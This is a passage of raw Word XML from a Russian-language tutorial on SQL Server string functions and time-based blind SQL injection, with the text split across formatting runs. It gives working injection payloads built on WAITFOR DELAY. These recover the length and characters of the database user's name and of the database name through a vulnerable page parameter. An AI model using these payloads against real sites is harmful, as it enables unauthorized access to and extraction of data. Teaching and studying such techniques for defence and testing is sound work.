      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -  положительное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количество символов выражения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которое будет возвращено. Если значение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отрицательно, формируется ошибка и выполнение инструкции прерывается. Если сумма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больше количества символов в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то возвращается часть значения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с позиции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до конца.</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LOWER</w:t>
      </w:r>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>someString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - возвращает символьное выражение после преобразования символьных данных верхнего регистра в символьные данные нижнего регистра.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 выражение символьных или двоичных данных.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может быть константой, переменной или столбцом. Аргумент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должен иметь тип данных, который может быть неявно </w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">преобразован в тип данных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 xml:space="preserve">. В противном случае используйте функцию CAST для явного преобразования типа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ASCII</w:t>
      </w:r>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>character_expression</w:t>
      </w:r>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- возвращает код ASCII первого символа указанного символьного выражения. character_expression - выражение типа char или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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C71B6" w:rsidRPr="003654EA" w:rsidRDefault="00187B14" w:rsidP="002C71B6">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 xml:space="preserve">DB_NAME() - возвращает имя базы данных. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C71B6" w:rsidRDefault="003C3BF9" w:rsidP="008E2C84">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаблон определ</w:t>
      </w:r>
      <w:r w:rsidR="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ения длины имени какого-либо объ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>екта базы данных:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3BF9" w:rsidRPr="00ED40D4" w:rsidRDefault="003C3BF9" w:rsidP="008E2C84">
      <w:pPr>
        <w:jc w:val="both"/>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(LEN(object)=k) WAITFOR DELAY ‘time’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3BF9" w:rsidRPr="00ED40D4" w:rsidRDefault="00AC3FC3" w:rsidP="00AC3FC3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:num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003C3BF9" w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="003C3BF9" w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>об</w:t>
      </w:r>
      <w:r w:rsidR="00ED40D4" w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ъ</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ект базы данных, для которого определяется длина.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3BF9"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k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – количество символов в имени </w:t>
      </w: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т.е. длина.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3FC3"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – время, через которое выполнится запрос, т.е. время </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>подвисания</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED40D4" w:rsidRDefault="00ED40D4" w:rsidP="00671BB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаблон определения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имени какого-либо объекта базы данных:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED40D4" w:rsidRPr="00ED40D4" w:rsidRDefault="00ED40D4" w:rsidP="003654EA">
      <w:pPr>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(ASCII(LOWER(SUBSTRING((object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start,length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)))&gt;97) WAITFOR DELAY '00:00:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED40D4" w:rsidRPr="00ED40D4" w:rsidRDefault="00ED40D4" w:rsidP="00671BB3">
      <w:p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xml:space="preserve"> – объект базы данных, для которого определяется длина.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003654EA" w:rsidRDefault="002A4219" w:rsidP="003654EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример определения количества символов в имени пользователя:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4219" w:rsidRPr="003654EA" w:rsidRDefault="003654EA" w:rsidP="003654EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Бинарным поиском ищем длину имени текущего пользователя - </w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http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site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page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asp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id</w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=1; </w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IF</w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEN</w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAITFOR</w:t>
      </w:r>
      <w:r w:rsidR="002A4219" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DELAY</w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> '00:00:10'--</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w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">правильных значениях </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> страница должна зависнуть на 10 секунд, если длинна</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имени пользователя СУБД больше числа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRDefault="00053534" w:rsidP="001B1F8C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее необходимо определить имя пользователя. Будем перебирать ко</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ды символов по позициям в имени. Этот способ требует гораздо большего количества запросов, но его также можно производить бинарным поиском. Пример:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00053534" w:rsidRDefault="00053534" w:rsidP="001B1F8C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASCII</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LOWER</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SUBSTRING</w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>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lang w:val="en-US"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003654EA" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
      <w:r w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)))&gt;97) WAITFOR </w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DELAY '00:00:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003654EA" w:rsidRDefault="003654EA" w:rsidP="003654EA">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При правильных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либо уменьшаем зону поиска соответствующего символа либо непосредственно находим его. </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B1F8C"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8A325B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее необходимо</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> всё тем же</w:t>
      </w:r>
      <w:r w:rsidRPr="008A325B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="008A325B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> баз</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> данных для этого пользователя. Пример</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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(DB_NAM</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E())&gt;k</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAITFOR DELAY '00:00:10'--</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rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При прав</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>льно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">м значении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узнаем длину имени базы данных.</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rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B1F8C"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8A325B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Мы определил</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и, чт</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">о длина имени базы данных равна </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
